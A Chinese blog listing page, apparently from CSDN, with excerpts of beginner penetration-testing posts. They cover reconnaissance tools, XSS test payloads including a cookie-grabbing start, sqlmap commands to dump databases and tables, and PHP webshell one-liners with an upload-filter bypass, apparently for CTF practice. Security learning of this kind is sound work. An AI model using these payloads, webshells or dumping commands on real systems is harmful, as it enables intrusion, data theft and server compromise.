- 博客(45)
- 收藏
- 关注
RSS订阅原创 渗透信息收集
nmap,zoomeye,fofa,shodan都很重要,还有一些whios查询,ip反查域名,python爬虫。描全网,黑暗引擎搜索特定文件(shadow,fofa,钟馗之眼等等),dns历史记录例如微步情报。2.信息收集主要收集:资产信息,子域名,第三方应用,操作系统,数据库,备案信息,微信公众号,等等。端口式:80,8080,443,25等等不同的端口不同的站点,端口映射或者端口转发。,可能是同IP,也可能是同网段,也可能不同网段(内网外网)一体化的站点:用phpstudy,宝塔搭建的网站。
2023-03-13 19:21:05
66
原创 XSS漏洞测试插入语句
先找到源代码,代码分析,适当闭合字符串,从而得以让插入语句被使用1.弹框<script>alert(123)</script>2.页面不停刷新<meta http-equiv='refresh' content='0'>3.嵌入其他网站<iframe src=http://127.0.0.1 width=0 height=0></iframe>4.获取cookie:<?php ...
2021-12-27 14:46:29
349
原创 sqlmap入门-爆库,爆表,列,字段
①当判断a为get注入点后(get)可使用python sqlmap.py -u "url?a=1" --dbs爆数据库假设结果中有member数据库②爆表python sqlmap.py -u "url?a=1" --tables -D member假设有表student③爆列python sqlmap.py -u "url?a=1" --column -T student -D member假设有列id,password,stasus等列④爆字段python sq
2021-11-14 20:06:24
7290
原创 sqlmap入门-判断注入点
①找到目标站,查看源代码,或者查找子链接,寻找可以尝试注入的参数,大多为$POST['a'],也有$GET['a'],当中a为可尝试注入的参数还有比如点击子链接url中出现http://www.*****.com/****.php?a=1出现http://www.******.com/*****.php?a=1&b=a等等②get型的注入命令,基本为python sqlmap.py(换到相应路径) -u "url" --level 1-5③post型的注入命令给,可以用brup...
2021-11-14 19:59:14
7274
3
原创 文件上传漏洞
①后端以黑名单方式过滤以.php .php3 .php5 .php8 .jsp. 各种脚本后缀的马,可以考虑使用.phtml文件格式上传<script language='php'>@eval($_POST['a']);</script><script language='php'>system('cat /flag');</script>②前端以白名单方式只允许某种格式文件上传,写好马,改后缀,burpsuit抓包修改后缀后上传,建议用蚁剑连接s
2021-11-12 14:33:06
2551
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人